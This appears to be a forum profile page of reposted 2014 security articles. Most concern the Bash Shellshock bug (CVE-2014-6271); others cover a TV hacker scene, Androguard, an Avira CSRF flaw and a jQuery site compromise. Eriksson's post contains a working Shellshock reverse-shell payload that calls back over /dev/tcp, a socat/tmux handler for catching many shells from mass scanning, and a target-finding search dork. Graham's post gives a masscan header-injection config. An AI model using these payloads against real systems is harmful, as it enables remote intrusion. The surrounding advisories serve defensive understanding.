Nytro

Everything posted by Nytro

  1. CVE-2014-6271 / Shellshock & How to handle all the shells!

Posted by Joel Eriksson on 2014-09-25

For the TL;DR generation: if you just want to know how to handle all the shells, search for “handling all the shells” and skip down to that.

CVE-2014-6271, also known as “Shellshock”, is quite a neat little vulnerability in Bash. It relies on a feature in Bash that allows child processes to inherit shell functions that were defined in the parent. I have played around with this feature before, many years ago, since it could be abused in another way in cases where SUID programs execute external shell scripts (or use system()/popen(), when /bin/bash is the default system shell) and with certain daemons that support environment variable passing.

When a SUID program is the target, the SUID program must first do something like setuid(geteuid()) for this to be exploitable, since inherited shell functions are not accepted when the UID differs from the EUID. When SUID programs call out to shell-script helpers (that need to be executed with elevated privileges) this is usually done, since most shells automatically drop privileges when starting up. In those cases, it was possible to trick Bash into executing a malicious shell function even when PATH is set explicitly to a “safe” value, or even when the full path is used for all calls to external programs. This was possible because Bash happily accepts slashes within shell function names.

This example demonstrates that problem, as well as the new (and much more serious) CVE-2014-6271 vulnerability.
je@tiny:~$ cat > bash-is-fun.c
/* CVE-2014-6271 + aliases with slashes PoC - je [at] clevcode [dot] org */

#include <unistd.h>
#include <stdio.h>

int main()
{
    char *envp[] = {
        "PATH=/bin:/usr/bin",
        "/usr/bin/id=() { "
        "echo pwn me twice, shame on me; }; "
        "echo pwn me once, shame on you",
        NULL
    };
    char *argv[] = { "/bin/bash", NULL };
    execve(argv[0], argv, envp);
    perror("execve");
    return 1;
}
^D
je@tiny:~$ gcc -o bash-is-fun bash-is-fun.c
je@tiny:~$ ./bash-is-fun
pwn me once, shame on you
je@tiny:/home/je$ /usr/bin/id
pwn me twice, shame on me

As you can see, the environment variable named “/usr/bin/id” is set to “() { cmd1; }; cmd2”. Due to the CVE-2014-6271 vulnerability, any command that is provided as “cmd2” is immediately executed when Bash starts. Due to the peculiarity I was already familiar with, the “cmd1” part is executed when trying to run id in a “secure” manner by providing the full path.

One of the possibilities that crossed my mind when I learned about this vulnerability was to exploit it over the web, since CGI programs use environment variables to pass various information that can be arbitrarily controlled by an attacker. For instance, the user-agent string is normally passed in the HTTP_USER_AGENT environment variable. It turns out I was not alone in thinking about this, though, and shortly after information about the “Shellshock” vulnerability was released, Robert Graham at Errata Security started scanning the entire internet for vulnerable web servers. It turns out there are quite a few of them. The scan is quite limited in the sense that it only discovers cases where the default page (GET /) of the default virtual host is vulnerable, and it only uses the Host, Referer, and Cookie headers. Another convenient header to use is User-Agent, which is normally passed in the HTTP_USER_AGENT variable.
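The slash-named-function part of the PoC above can also be reproduced without the C wrapper, since env(1) will happily place variable names (like "/usr/bin/id") into the environment that the shell itself would reject. A sketch:

```shell
# On an old, unpatched bash the injected function shadows the real binary
# and prints "pwn me twice, shame on me"; on a patched bash the definition
# is refused and the real /usr/bin/id simply runs.
env '/usr/bin/id=() { echo pwn me twice, shame on me; }' \
    bash -c '/usr/bin/id'
```

Which of the two outputs you see is itself a rough indicator of how old your bash is.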
Another way to find lots and lots of potentially vulnerable targets is to do a simple Google search for “inurl:cgi-bin filetype:sh” (without the quotes). As you may have realized by now, the impact of this vulnerability is enormous.

So, now to the part about handling all the shells. Let’s say you are testing a large subnet (or the entire internet) for this vulnerability, and don’t want to settle for a ping -c N ADDR payload like the one Robert Graham used in his PoC. A simple netcat listener is obviously no good, since that will only be useful for dealing with a single reverse shell. My solution gives you as many shells as the number of windows tmux can handle (a lot).

Let’s assume you want a full reverse-shell payload, and let’s also assume that you want a full shell with job control and a pty instead of the less convenient one you usually get under these circumstances. Assuming a Python interpreter is installed on the target, which is usually a pretty safe bet nowadays, I would suggest a payload such as this (with ADDR and PORT replaced with your IP and port number, of course):

() { :; }; bash -c 'python -c "import pty; pty.spawn(\"/bin/bash\")" <> /dev/tcp/ADDR/PORT >&0 2>&0'

To try this out, just run this in one shell to start a listener:

stty -echo raw; nc -l 12345; stty sane

Then do this in another shell:

bash -c 'python -c "import pty; pty.spawn(\"/bin/bash\")" <> /dev/tcp/127.0.0.1/12345 >&0 2>&0'

To deal with all the shells coming your way, I would suggest some tmux+socat magic I came up with when dealing with similar “problems” in the past.
Place the code below in a file named “alltheshells-handler” and make it executable (chmod 700):

#!/bin/sh
tmux has-session -t alltheshells 2>/dev/null \
    || tmux new-session -d -s alltheshells "cat>/dev/null" \; rename-window info
tmux send-keys -t alltheshells:info \
    "$(date '+%Y-%m-%d %H:%M:%S') Received a shell from $SOCAT_PEERADDR" Enter
mkdir /tmp/alltheshells 2>/dev/null
tmux new-window -d -t alltheshells -n "$SOCAT_PEERADDR" \
    "sleep 1; stty -echo raw; socat unix-client:/tmp/alltheshells/$$.sock -; stty sane; echo; echo EOF; read"
socat unix-listen:/tmp/alltheshells/$$.sock -

Execute this command to start the listener handling all your shells (replace PORT with the port number you want to listen on):

socat tcp-l:PORT,reuseaddr,fork exec:./alltheshells-handler

When the shells start popping you can do:

tmux attach -t alltheshells

The tmux session will not be created until at least one reverse shell has arrived, so if you’re impatient just connect to the listener manually to get it going. If you want to try this with my personal spiced-up tmux configuration, it is available on Pastebin. Switch between windows (shells) by simply using ALT-n / ALT-p for the next/previous one. Note that I use ALT-e as my meta key instead of CTRL-B, since I use CTRL-B for other purposes. Feel free to change this to whatever you are comfortable with.

Sursa: CVE-2014-6271 / Shellshock & How to handle all the shells! | ClevCode
  2. [h=3]Bash 'shellshock' scan of the Internet[/h]

By Robert Graham

I'm running a scan right now of the Internet to test for the recent bash vulnerability, to see how widespread this is. My scan works by stuffing a bunch of "ping home" commands in various CGI variables. It's coming from IP address 209.126.230.72. The configuration file for masscan looks something like:

target = 0.0.0.0/0
port = 80
banners = true
http-user-agent = shellshock-scan (Errata Security: Bash 'shellshock' scan of the Internet)
http-header[Cookie] = () { :; }; ping -c 3 209.126.230.74
http-header[Host] = () { :; }; ping -c 3 209.126.230.74
http-header[Referer] = () { :; }; ping -c 3 209.126.230.74

(Actually, these last three options don't quite work due to a bug, so you have to manually add them to the code: https://github.com/robertdavidgraham/masscan/blob/master/src/proto-http.c#L120)

Some early results show that this bug is widespread. A discussion of the results is in the next blog post. The upshot is this: while this scan found only a few thousand systems (because it's intentionally limited), it looks like the potential for a worm is high.

Sursa: Errata Security: Bash 'shellshock' scan of the Internet
  3. We spent a good chunk of the day investigating the now-famous bash bug, so I had no time for too many jokes about it on Twitter - but I wanted to jot down several things that have been getting drowned out in the noise earlier in the day.

Let's start with the nature of the bug. At its core, the problem is caused by an obscure and little-known feature that allows bash programs to export function definitions from a parent shell to child shells, similarly to how you can export normal environmental variables. The functionality in action looks like this:

$ function foo { echo "hi mom"; }
$ export -f foo
$ bash -c 'foo'  # Spawn nested shell, call 'foo'
hi mom

The behavior is implemented as a hack involving specially-formatted environmental variables: in essence, any variable whose value starts with a literal "() {" will be dispatched to the parser just before executing the main program. You can see this in action here:

$ foo='() { echo "hi mom"; }' bash -c 'foo'
hi mom

The concept of giving magical properties to certain values of environmental variables clashes with several ancient customs - most notably, with the tendency for web servers such as Apache to pass client-supplied strings in the environment to any subordinate binaries or scripts. Say, if I request a CGI or PHP script from your server, the env variables $HTTP_COOKIE and $HTTP_USER_AGENT will probably be initialized to the raw values seen in the original request. If the values happen to begin with "() {" and are ever seen by /bin/bash, events may end up taking an unusual turn.

And so, the bug we're dealing with stems from the observation that trying to parse function-like strings received in HTTP_* variables could have some unintended side effects in the shell - namely, it could easily lead to your server executing arbitrary commands trivially supplied in an HTTP header by random people on the Internet.
With that out of the way, it is important to note that today's patch provided by the maintainer of bash does not stop the shell from trying to parse the code within headers that begin with "() {" - it merely tries to get rid of that particular RCE side effect, originally triggered by appending commands past the end of the actual function definition. But even with all the current patches applied, you can still do this:

Cookie: () { echo "Hello world"; }

...and witness a callable function dubbed HTTP_COOKIE() materialize in the context of subshells spawned by Apache; of course, the name will always be prefixed with HTTP_*, so it's unlikely to clash with anything or be called by accident - but intuitively, it's a pretty scary outcome. In the same vein, doing this will also have an unexpected result:

Cookie: () { oops

If specified on a request to a bash-based CGI script, you will see a scary bash syntax error message in your error log.

All in all, the fix hinges on two risky assumptions:

1. That the bash function parser invoked to deal with variable-originating function definitions is robust and does not suffer from the usual range of low-level C string parsing bugs that almost always haunt similar code - a topic that hasn't been studied in much detail until now.

2. That the parsing steps are guaranteed to have no global side effects within the child shell. As it happens, this assertion has already been proved wrong by Tavis; the side effect he found probably-maybe isn't devastating in the general use case (at least until the next stroke of brilliance), but it's certainly a good reason for concern.

If I were a betting man, I would not bet on the fix holding up in the long haul. A more reasonable solution would involve temporarily disabling function exports or blacklisting some of the most dangerous variable patterns (e.g., HTTP_*); and later on, perhaps moving to a model where function exports use a distinct namespace while present in the environment.

What else?
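Whether a header-shaped value still turns into a function after patching depends on which bash build you have; a quick local probe (a sketch, run against whatever bash is installed):

```shell
# With only the first patch applied (the situation described above), the value
# is still parsed and HTTP_COOKIE becomes a callable function; with the later
# BASH_FUNC_*%% export encoding it is treated as an ordinary string and
# "type" finds nothing.
env 'HTTP_COOKIE=() { echo hello from a header; }' \
    bash -c 'type HTTP_COOKIE 2>/dev/null || echo "not imported as a function"'
```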
Oh, of course: the impact of this bug is an interesting story all in itself. At first sight, the potential for remote exploitation should be limited to CGI scripts that start with #!/bin/bash and to several other programs that explicitly request this particular shell. But there's a catch: on a good majority of modern Linux systems, /bin/sh is actually a symlink to /bin/bash!

This means that web apps written in languages such as PHP, Python, C++, or Java are likely to be vulnerable if they ever use libcalls such as popen() or system(), all of which are backed by calls to /bin/sh -c '...'. There is also some added web-level exposure through #!/bin/sh CGI scripts, <!--#exec cmd="..."> calls in SSI, and possibly more exotic vectors such as mod_ext_filter.

For the same reason, userland DHCP clients that invoke configuration scripts and use variables to pass down config details are at risk when exposed to rogue servers (e.g., on open wifi). Finally, there is some exposure for environments that use restricted SSH shells (possibly including Git) or restricted sudo commands, but the security of such approaches is typically fairly modest to begin with.

Exposure on other fronts is possible, but probably won't be as severe. The worries around PHP and other web scripting languages, along with the concern for userspace DHCP, are the most significant reasons to upgrade - and perhaps to roll out more paranoid patches, rather than relying solely on the two official ones. On the upside, you don't have to worry about non-bash shells - and that covers a good chunk of embedded systems of all sorts.

PS. As for the inevitable "why hasn't this been noticed for 15 years" / "I bet the NSA knew about it" stuff - my take is that it's a very unusual bug in a very obscure feature of a program that researchers don't really look at, precisely because no reasonable person would expect it to fail this way. So, life goes on.
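A quick way to check the /bin/sh exposure described above on a given machine (a sketch; how /bin/sh is provided varies across distributions):

```shell
# If /bin/sh resolves to bash, every system(3)/popen(3) call in C, PHP,
# Python, etc. funnels through the vulnerable parser; if it is dash or
# busybox, those particular vectors are closed.
readlink -f /bin/sh

# Ask the shell itself, which works even when /bin/sh is not a symlink:
# bash sets BASH_VERSION, other shells leave it unset.
/bin/sh -c 'echo "${BASH_VERSION:-not bash}"'
```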
Sursa: lcamtuf's blog: Quick notes about the bash bug, its impact, and the fixes so far
  4. Bash specially-crafted environment variables code injection attack

Posted on 2014/09/24 by Huzaifa Sidhpurwala

Bash, or the Bourne again shell, is a UNIX-like shell which is perhaps one of the most installed utilities on any Linux system. Since its creation in 1980, bash has evolved from a simple terminal-based command interpreter to many other fancy uses.

In Linux, environment variables provide a way to influence the behavior of software on the system. They typically consist of a name which has a value assigned to it. The same is true of the bash shell. It is common for a lot of programs to run the bash shell in the background. It is often used to provide a shell to a remote user (via ssh or telnet, for example), provide a parser for CGI scripts (Apache, etc.) or even provide limited command execution support (git, etc.).

Coming back to the topic, the vulnerability arises from the fact that you can create environment variables with specially-crafted values before calling the bash shell. These variables can contain code, which gets executed as soon as the shell is invoked. The name of these crafted variables does not matter, only their contents. As a result, this vulnerability is exposed in many contexts, for example:

• ForceCommand is used in sshd configs to provide limited command execution capabilities for remote users. This flaw can be used to bypass that and provide arbitrary command execution. Some Git and Subversion deployments use such restricted shells. Regular use of OpenSSH is not affected because users already have shell access.

• Apache servers using mod_cgi or mod_cgid are affected if CGI scripts are either written in bash or spawn subshells. Such subshells are implicitly used by system/popen in C, by os.system/os.popen in Python, by system/exec in PHP (when run in CGI mode), and by open/system in Perl if a shell is used (which depends on the command string). PHP scripts executed with mod_php are not affected even if they spawn subshells.
• DHCP clients invoke shell scripts to configure the system, with values taken from a potentially malicious server. This would allow arbitrary commands to be run, typically as root, on the DHCP client machine.

• Various daemons and SUID/privileged programs may execute shell scripts with environment variable values set or influenced by the user, which would allow arbitrary commands to be run.

• Any other application which is hooked onto a shell or runs a shell script using bash as the interpreter.

Shell scripts which do not export variables are not vulnerable to this issue, even if they process untrusted content and store it in (unexported) shell variables and open subshells.

Like “real” programming languages, Bash has functions, though in a somewhat limited implementation, and it is possible to put these bash functions into environment variables. This flaw is triggered when extra code is added to the end of these function definitions (inside the environment variable). Something like:

$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
vulnerable
this is a test

The patch used to fix this flaw ensures that no code is allowed after the end of a bash function. So if you run the above example with the patched version of bash, you should get output similar to:

$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x'
this is a test

We believe this should not affect any backward compatibility. It would, of course, affect any scripts which try to use environment variables created in the way described above, but doing so should be considered bad programming practice. Red Hat has issued security advisories that fix this issue for Red Hat Enterprise Linux. Fedora has also shipped packages that fix this issue.
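The point about unexported variables can be seen directly (a minimal sketch):

```shell
# A plain assignment never reaches a child's environment, so even a
# function-shaped string stored from untrusted input cannot be imported
# by a spawned bash:
x='() { :;}; echo leaked'          # note: not exported
bash -c 'echo "${x:-x never left the parent shell}"'
```

This is why scripts that merely hold untrusted content in ordinary shell variables are safe from this flaw; only exported values cross the process boundary.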
Additional information regarding specific Red Hat products affected by this issue can be found at https://access.redhat.com/site/solutions/1207723. Information on CentOS can be found in the "[CentOS] Critical update for bash released today" announcement.

Sursa: https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/
  5. Bash-ing Into Your Network – Investigating CVE-2014-6271

Posted by Jen Ellis in Information Security on Sep 25, 2014 3:34:35 AM

By now, you may have heard about CVE-2014-6271, also known as the "bash bug", or even "Shell Shock", depending on where you get your news. This vulnerability was discovered by Stephane Chazelas of Akamai and is potentially a big deal. It’s rated the maximum CVSS score of 10 for impact and ease of exploitability. The affected software, Bash (the Bourne Again SHell), is present on most Linux, BSD, and Unix-like systems, including Mac OS X. New packages were released today, but further investigation made it clear that the patched version may still be exploitable, and at the very least can be crashed due to a null pointer exception. The incomplete fix is being tracked as CVE-2014-7169.

Should I panic?

The vulnerability looks pretty awful at first glance, but most systems with Bash installed will NOT be remotely exploitable as a result of this issue. In order to exploit this flaw, an attacker would need the ability to send a malicious environment variable to a program interacting with the network, and this program would have to be implemented in Bash or spawn a sub-command using Bash. The Red Hat blog post goes into detail on the conditions required for a remote attack. The most commonly exposed vector is likely going to be legacy web applications that use the standard CGI implementation. On multi-user systems, setuid applications that spawn "safe" commands on behalf of the user may also be subverted using this flaw. Successful exploitation of this vulnerability would allow an attacker to execute arbitrary system commands at a privilege level equivalent to that of the affected process.

What is vulnerable?

This attack revolves around Bash itself, and not a particular application, so the paths to exploitation are complex and varied.
So far, the Metasploit team has been focusing on the web-based vectors, since those seem to be the most likely avenues of attack. Standard CGI applications accept a number of parameters from the user, including the browser's user-agent string, and store these in the process environment before executing the application. A CGI application that is written in Bash or calls system() or popen() is likely to be vulnerable, assuming that the default shell is Bash.

Secure Shell (SSH) will also happily pass arbitrary environment variables to Bash, but this vector is only relevant when the attacker has valid SSH credentials yet is restricted to a limited environment or a specific command. The SSH vector is likely to affect source code management systems and the administrative command-line consoles of various network appliances (virtual or otherwise). There are likely many other vectors (DHCP client scripts, etc.), but they will depend on whether the default shell is Bash or an alternative such as Dash, Zsh, Ash, or Busybox, which are not affected by this issue.

Modern web frameworks are generally not going to be affected. Simpler web interfaces, like those you find on routers, switches, industrial control systems, and other network devices, are unlikely to be affected either, as they either run proprietary operating systems, or they use Busybox or Ash as their default shell in order to conserve memory. A quick review of approximately 50 firmware images from a variety of enterprise, industrial, and consumer devices turned up no instances where Bash was included in the filesystem. By contrast, a cursory review of a handful of virtual appliances had a 100% hit rate, but the web applications were not vulnerable due to how the web server was configured. As a counter-point, Digital Bond believes that quite a few ICS and SCADA systems include the vulnerable version of Bash, as outlined in their blog post.
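For reference, the kind of CGI script that exposes this vector is tiny. A hypothetical example (the script name and contents are assumptions, not taken from the article):

```shell
#!/bin/bash
# status.sh - hypothetical diagnostic CGI script of the style discussed above.
# By the time bash reaches this first line, the web server has already placed
# HTTP_USER_AGENT, HTTP_COOKIE, etc. into the environment - which is exactly
# the moment a vulnerable bash would have executed an injected
# "() { :; }; ..." payload from a request header.
echo "Content-Type: text/plain"
echo
echo "Server uptime:"
uptime
```

Nothing in the script itself is buggy; the exposure comes entirely from the interpreter importing attacker-controlled environment variables before the first line runs.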
Robert Graham of Errata Security believes there is potential for a worm after he identified a few thousand vulnerable systems using Masscan. The esteemed Michal Zalewski also weighed in on the potential impact of this issue. In summary, there just isn't enough information available to predict how many systems are potentially exploitable today.

The two most likely situations where this vulnerability will be exploited in the wild:

• Diagnostic CGI scripts that are written in Bash, or that call out to system() where Bash is the default shell

• PHP applications running in CGI mode that call out to system(), where Bash is the default shell

Bottom line: this bug is going to affect an unknowable number of products and systems, but the conditions for remote exploitation are fairly uncommon.

Is it as bad as Heartbleed?

There has been a great deal of debate on this in the community, and we’re not keen to jump on the “Heartbleed 2.0” bandwagon. The conclusion we reached is that some factors are worse, but the overall picture is less dire. This vulnerability enables attackers not just to steal confidential information, as with Heartbleed, but also to take over the device or system and execute code remotely. From what we can tell, the vulnerability is most likely to affect a lot of systems, but it isn't clear which ones, or how difficult those systems will be to patch. The vulnerability is also incredibly easy to exploit. Put that together and you are looking at a lot of confusion and the potential for large-scale attacks. BUT – and that’s a big but – per the above, there are a number of factors that need to be in play for a target to be susceptible to attack. Every affected application may be exploitable through a slightly different vector or have different requirements to reach the vulnerable code. This may significantly limit how widespread attacks will be in the wild. Heartbleed was much easier to test for conclusively, and its impact was far more widespread.
How can you protect yourself?

The most straightforward answer is to deploy the patches that have been released as soon as possible. Even though the patch for CVE-2014-6271 is not a complete fix, the patched packages are more complicated to exploit. We expect to see new packages arrive to address CVE-2014-7169 in the near future. If you have systems that cannot be patched (for example, systems that are end-of-life), it’s critical that they are protected behind a firewall. A big one. And test whether that firewall is secure.

What can we do to help?

Rapid7's Nexpose and Metasploit products have been updated to assist with the detection and verification of these issues. Nexpose has been updated to check for CVE-2014-6271 via credentialed scans and will be updated again soon to cover the new packages released for CVE-2014-7169. Metasploit added a module to the framework a few hours ago and it will become available in both Metasploit Community and Metasploit Pro in our weekly update. We strongly recommend that you test your systems as soon as possible and deploy any necessary mitigations. If you would like some advice on how to handle this situation, our Services team can help.

Are Rapid7’s solutions affected?

Based on our current investigation, we are confident that our solutions are not impacted by this vulnerability in any way that could affect our customers and users. If we become aware of any further possibilities for exploitation, we’ll update this blog to keep you informed.

Sursa: https://community.rapid7.com/community/infosec/blog/2014/09/25/bash-ing-into-your-network-investigating-cve-2014-6271
  6. [h=1]Scorpion Brings the Stupidest, Most Batshit Insane Hacker Scene Ever[/h] So Scorpion debuted last night on CBS, bringing us the thrilling tale of "geniuses" who help DHS by setting up wifi access points in restaurants. Yes, that is a true plot point. It all leads to this scene, whose true meaning I will unfold for you so that you can appreciate the full amazing awfulness. https://www.youtube.com/watch?v=igxrvISaY4E All you need to know about the main character is that he's a genius who is "on software," which means he tells people things like "open your email and click the link." He has trouble communicating his emotions because he's a geek who only understands machines, and he has a dusty warehouse space that's shared by a tough hardware expert, a hat-wearing psychology master, and a nerdy "human calculator." This week, the DHS brings him an emergency! There is a bug in the local airport's software and now 200 planes are going to crash if he doesn't do something! So he decides that the best thing to do is reboot from a backup version (yes that is the ACTUAL SUPER ELITE HIGH TECH THING HE'S DOING). But where is the backup? Ohhhh, it turns out EVERY PLANE has it, and if only they could download it from one of the planes, everybody could land and nobody would crash. The only way to get that backup, though, is USING AN ETHERNET CABLE DANGLED OUT OF THE BOTTOM OF THE PLANE AND PLUGGED INTO HIS LAPTOP. Oh I know, I know — you think that's ridiculous, right? But it's not! Because they ALREADY TRIED A WIFI CONNECTION and it didn't work. So obviously the next thing is the ethernet cable. Also, the best way to do all this is to fly the plane low over the car that is racing ON THE LANDING STRIP. 
No, don't LAND THE DAMN PLANE on said strip and then reboot from the plane's backup (note that I am not even getting into the sheer dumbfoundery of the notion that the planes all have a backup of the software, or that the entire airport is run on "a piece of software," or that you can't land without software EVEN THOUGH WE ACTUALLY INVENTED PLANES BEFORE WE INVENTED COMPUTERS). Oh and also? At one point, we see that all the computers are running VMware. Which — did VMware pay for product placement? Did Scorpion hire somebody with a job title like "cybersecurity ninja" from VMware to advise them? We may never know. So anyway the guy gets some random chick from the diner where he installed some wifi to drive with him in his car and hook up the ethernet cable and save the airport. Yay! Airport rebooted! Hacker triumph! Next week, the geniuses will help a guy whose pants keep falling down. I apologize for all the caps but I had a lot of feels. Sursa: Scorpion Brings the Stupidest, Most Batshit Insane Hacker Scene Ever
  7. Google's latest object recognition tech can spot everything in your living room

by Jon Fingas | @jonfingas | September 8th 2014 at 4:38 am

Automatic object recognition in images is currently tricky. Even if a computer has the help of smart algorithms and human assistants, it may not catch everything in a given scene. Google might change that soon, though; it just detailed a new detection system that can easily spot lots of objects in a scene, even if they're partly obscured. The key is a neural network that can rapidly refine the criteria it's looking for without requiring a lot of extra computing power. The result is a far deeper scanning system that can both identify more objects and make better guesses -- it can spot tons of items in a living room, including (according to Google's odd example) a flying cat. The technology is still young, but the internet giant sees its recognition breakthrough helping everything from image searches through to self-driving cars. Don't be surprised if it gets much easier to look for things online using only the vaguest of terms.

Sursa: Google's latest object recognition tech can spot everything in your living room
  8. It raises the post count and creates fresh content for Google, SEO. That way, when people search Google for "salut" (hello), they will land on RST and learn how to say hello.
  9. A quick fix is already available: apt-get update / yum update, or whatever else you prefer.
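Concretely, the upgrade-and-verify loop looks like this (a sketch; the package manager command depends on the distribution and needs root):

```shell
# Debian/Ubuntu:
#   sudo apt-get update && sudo apt-get install --only-upgrade bash
# RHEL/CentOS/Fedora:
#   sudo yum update bash
#
# Then re-run the canonical check from the advisories above; a vulnerable
# bash prints "vulnerable" first, a patched one prints only the final line:
env x='() { :;}; echo vulnerable' bash -c 'echo check complete'
```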
  10. ########################################################################## ################################# Androguard ############################# ########################################################################## ################### http://code.google.com/p/androguard ################## ######################## dev (at) androguard.re ########################## ########################################################################## 1 -] About Androguard (Android Guard) is primarily a tool written in full python to play with : - DEX, ODEX - APK - Android's binary xml 2 -] Usage You need to follow the following information to install dependencies for androguard : Installation - androguard - How to install Androguard - Reverse engineering, Malware and goodware analysis of Android applications ... and more (ninja !) - Google Project Hosting You must go to the website to see more example : Usage - androguard - Reverse engineering, Malware and goodware analysis of Android applications ... and more (ninja !) - Google Project Hosting 2.1 --] API 2.1.1 --] Instructions http://code.google.com/p/androguard/wiki/Instructions 2.2 --] Demos see the source codes in the directory 'demos' 2.3 --] Tools Usage - androguard - Reverse engineering, Malware and goodware analysis of Android applications ... and more (ninja !) - Google Project Hosting 2.4 --] Disassembler http://code.google.com/p/androguard/wiki/Disassembler 2.5 --] Analysis http://code.google.com/p/androguard/wiki/Analysis 2.6 --] Visualization Visualization - androguard - Reverse engineering, Malware and goodware analysis of Android applications ... and more (ninja !) 
- Google Project Hosting 2.7 --] Similarities, Diffing, plagiarism/rip-off indicator http://code.google.com/p/androguard/wiki/Similarity http://code.google.com/p/androguard/wiki/DetectingApplications 2.8 --] Open Source database of android malwares DatabaseAndroidMalwares - androguard - Open Source database of android malware (links + signatures) - Reverse engineering, Malware and goodware analysis of Android applications ... and more (ninja !) - Google Project Hosting 2.9 --] Decompiler 2.10 --] Reverse RE - androguard - Reverse Engineering Tutorial of Android Apps - Reverse engineering, Malware and goodware analysis of Android applications ... and more (ninja !) - Google Project Hosting 3 -] Roadmap/Issues RoadMap - androguard - Features and roadmap - Reverse engineering, Malware and goodware analysis of Android applications ... and more (ninja !) - Google Project Hosting Issues - androguard - Reverse engineering, Malware and goodware analysis of Android applications ... and more (ninja !) - Google Project Hosting 4 -] Authors: Androguard Team Androguard + tools: Anthony Desnos <desnos at t0t0.fr> DAD (DAD is A Decompiler): Geoffroy Gueguen <geoffroy dot gueguen at gmail dot com> 5 -] Contributors Craig Smith <agent dot craig at gmail dot com>: 64 bits patch + magic tricks 6 -] Licenses 6.1 --] Androguard Copyright © 2012, Anthony Desnos <desnos at t0t0.fr> All rights reserved. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS-IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. 
6.2 --] DAD

Copyright © 2012, Geoffroy Gueguen <geoffroy.gueguen@gmail.com>
All rights reserved.

Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at

http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.

Sursa: https://github.com/androguard/androguard
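The file formats Androguard targets are easy to poke at even without the framework installed: an APK is just a ZIP archive whose code lives in classes.dex files, with AndroidManifest.xml stored as binary XML. As a dependency-free, illustrative sketch (this is plain stdlib triage, not the androguard API):

```python
import io
import zipfile

def apk_inventory(data: bytes) -> dict:
    """Rough triage of an APK before handing it to a framework like
    androguard: list the DEX code files and the (binary) XML resources."""
    inv = {"dex": [], "xml": []}
    with zipfile.ZipFile(io.BytesIO(data)) as apk:
        for name in apk.namelist():
            if name.endswith(".dex"):
                inv["dex"].append(name)
            elif name.endswith(".xml"):
                inv["xml"].append(name)
    return inv

# Build a tiny stand-in APK in memory to demonstrate (not a real app).
buf = io.BytesIO()
with zipfile.ZipFile(buf, "w") as z:
    z.writestr("classes.dex", b"dex\n035\x00")
    z.writestr("AndroidManifest.xml", b"\x03\x00\x08\x00")
```

Real analysis of the DEX bytecode and the binary XML encoding is exactly what androguard's own parsers are for; this only shows where those pieces live inside the archive.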
  11. Avira – Critical CSRF flaw vulnerability puts millions of users at risk
by Pierluigi Paganini on September 20th, 2014

An Egyptian bug hunter discovered that the Avira website is affected by a CSRF flaw that allows attackers to hijack users' accounts and access their online backups.

What would you think if I told you that an antivirus could represent a menace for your system? An antivirus, like any other kind of software, could be exploited by threat actors to compromise the machine, as already explained in my previous post. The popular antivirus software Avira, which includes a Secure Backup service, is vulnerable to a critical web application vulnerability that could allow an attacker to take over a user's account.

The Egyptian 16-year-old expert Mazen Gamal reported to The Hacker News that the Avira website is affected by a CSRF (cross-site request forgery) vulnerability that allows an attacker to hijack users' accounts and access their online secure cloud backup files. The CSRF vulnerability potentially puts millions of Avira users' accounts at risk.

CSRF makes an end user execute unwanted actions on a web application once he is authenticated. In a typical attack scheme, the attacker sends a link via email or through a social media platform, or shares a specially crafted HTML exploit page, to trick the victim into executing actions of the attacker's choosing. In this specific case an attacker could use a CSRF exploit to trick a victim into accessing a malicious link that contains requests which will replace the victim's email ID on the Avira account with the attacker's email ID.

With this CSRF attack the victim's account can be easily compromised: after replacing the email address, the attacker can reset the password of the victim's account by running the forgotten-password procedure, because Avira will send the password reset link to the attacker's email ID instead of the victim's.
Once the attacker has gained access to the victim's account, he would be able to retrieve the victim's online backup, which includes files the user has stored with the Online Backup software (https://dav.backup.avira.com/).

"I found a CSRF vulnerability in Avira can lead me to full account takeover of any Avira user account," Gamal said via an email to The Hacker News. "The impact of the account takeover allowed me to Open the Backup files of the victim and also view the license codes for the affected user."

Gamal also provided a proof-of-concept video to demonstrate his discovery. He reported the vulnerability to the Avira security team on August 21st; the team acknowledged the flaw and fixed the CSRF bug on their website, but the secure online backup service "is still vulnerable to hackers until Avira will not offer a offline password layer for decrypting files locally."

Mazen Gamal has been recognized as an official bug hunter by Avira.

Pierluigi Paganini
(Security Affairs – AVIRA, CSRF)

Sursa: Avira - Critical CSRF flaw Vulnerability puts millions users at risk | Security Affairs
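The underlying flaw is the classic one: the email-change request carried nothing a cross-site attacker could not forge. A minimal sketch of the standard defence (illustrative only, not Avira's actual fix) ties each state-changing request to a secret token stored in the session:

```python
import hmac
import secrets

def issue_csrf_token(session: dict) -> str:
    """Mint a per-session token; the legitimate form embeds it."""
    session["csrf_token"] = secrets.token_hex(16)
    return session["csrf_token"]

def allow_email_change(session: dict, submitted_token: str) -> bool:
    """Honour the request only if it echoes the session's token back.
    A forged cross-site request cannot read the victim's page, so it
    cannot supply the right value."""
    expected = session.get("csrf_token")
    return bool(expected) and hmac.compare_digest(expected, submitted_token)

session = {}
token = issue_csrf_token(session)
```

The constant-time comparison via hmac.compare_digest avoids leaking the token through timing differences.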
  12. Official jQuery Website Abused in Drive-by Download Attack
By Eduard Kovacs on September 23, 2014

The official website for the popular JavaScript library jQuery (jquery.com) has been compromised and abused by cybercriminals to distribute information-stealing malware, RiskIQ has reported.

Roughly 70 percent of the world's top 10,000 websites rely on jQuery for dynamic content, and because most jQuery users are website and systems administrators who maintain elevated privileges within their networks, it's possible that this attack is part of an operation whose goal is to compromise the systems of major organizations, RiskIQ said.

"Typically, these individuals have privileged access to web properties, backend systems and other critical infrastructure. Planting malware capable of stealing credentials on devices owned by privilege accounts holders inside companies could allow attackers to silently compromise enterprise systems, similar to what happened in the infamous Target breach," James Pleger, RiskIQ Director of Research, explained in a blog post.

